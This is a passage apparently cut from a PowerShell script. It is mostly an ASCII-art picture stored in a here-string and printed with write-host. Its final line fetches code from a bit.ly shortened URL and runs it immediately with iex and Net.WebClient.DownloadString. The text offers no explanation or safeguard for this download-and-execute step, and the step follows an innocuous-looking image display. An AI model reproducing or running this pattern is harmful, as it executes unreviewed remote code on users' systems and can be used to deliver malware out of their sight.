MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNxc:;::;;:c::cc:;:c:;:::;;;;:::;,;clc:;;,,,,,,;;;:;;;;,;;;;;;;;;;;;;;;;;;;::::;::::;::;;;;;:::cccccccc:;:cc::cc:::;;:::cc:::cc:::cccccc::clcc::cl:::cccc:cccc::cc:ccllccc:dNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdcllc:cllcccccc:cc::cc:cc:::::;,:llc:;;;,;;;;;;;;;;;;;;;;::;;;;::::;;::::;:;;;:::::c:::::::::cccc:::::::ccc:ccc::;::::ccc:::::ccclccll:clllcccllccccllc::ccc:cc:ccccc::ccdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd:::;:clc::::cc:cc::c:;:::;;;;;::ccc:,;;;;;;;:::;;;;;:c:;::;;;::;::::::c:::::;::::ccc::ccccc::ccccc::::cccccccclc::::ccllcc:::cclccllc:cccccccc:cllllllccccc::::cclllcclcdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdc:;:cccc:cc:lc:cc:::cccclc::;;:cllc:;;;;;:;;;;:::;;:ccc:::;;:cc::::cccccccccc::::c:::::ccccccclccc:::clccllc:clc:::::::clccc:cccclccc:ccccclcc:cccccclccccc::cccccllc::cdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXdc:::::ccc;::ccccccccllcclc;;;;:::::;;;;;;:;;;:::::;;:::::c:;;:cccccc:c::cclccccc::ccc::ccccc:::::::::ccccllc:cc:::::c::lolcccccllcclcllcccc:cccccllccllllcccclccccccccccxNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXdcc:::::c:::::ccc:clc:::;:;,;;;::c:;;;;;;;;;;:::::::::cc:cc:;;:::c:ccccccclccccccccccccclcclcccccc::::cllllllccc:::::c::::c::ccclllllllolc::cllll::clcccccccc::ccccccccccxNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo:cccccc::::c:::::::cc::;;;;;;;;:lc:;;:;;;;;;::::cc:ccc::cc:::ccc:::ccccccccccc:cccccccc:::ccccclcc::cccccllcclc:::::cccclccccloolllllllllcccllllccccccllllcc:::ccccc::::dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd:cc::::;:ccc:;::c::::::::;;;;;;:cc;;;;;;;::::::::::cccccc::ccccc:c:cc:ccc::clllccccc::::c:cc::llccccccccclccccc:::clc::cccccclllccllllccccccllclllccclccccllccc:ccllccc:dXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo;:;;cc::c::cc::ccccl:;:::;;;;;;clc:;;;:::::::::c::::::ccc::ccccc:::cc::cc:::clccllcccccc::cc:ccccccc:clcllccccc:::ccc:ccclllollccllllccllcllolclllcccccllcccllclccllccl:dNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd;;;::::;:::;::::ccc::::::::::::loc:;;;:c:::::::::::::::cc::cccc::::c::ccccccccc:ccc::ccc::clcccccccccllcccccllc:::cccccccllcccccccccccclllclllcccccllccllcccccclcccccclcdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo;;;ccc::cc:::c:::::cccccc:::::clcc:;;;:::::::::::::ccc::cccccccccccll:::ccccccc:cccccc::cccccccllllccllccccllcccccccllcclllcccccccllllllllcccllccccllllclclllcclllcllllcdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMXo;::clc::::c:::;::::::::cc:::;:cclc:::::::::ccc:::::ccccccccccccccloolcccllcccccccccccccccccclllcccc:colllclllccc:ccccclllccccccccllccclolcccllolcccllclollllllccccclccccdXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd;:::c:cl:;;::::cclc;;:::clc:::clol:;:c:::::clc::::::lolccccc:::::ccccccccccclcclllcccccccccclllc::::colllllllllcccccccccclllcccccllcclclccccllllloolllooolccllcccccccclldXMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


"@

write-host $bestart

}


iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")

}
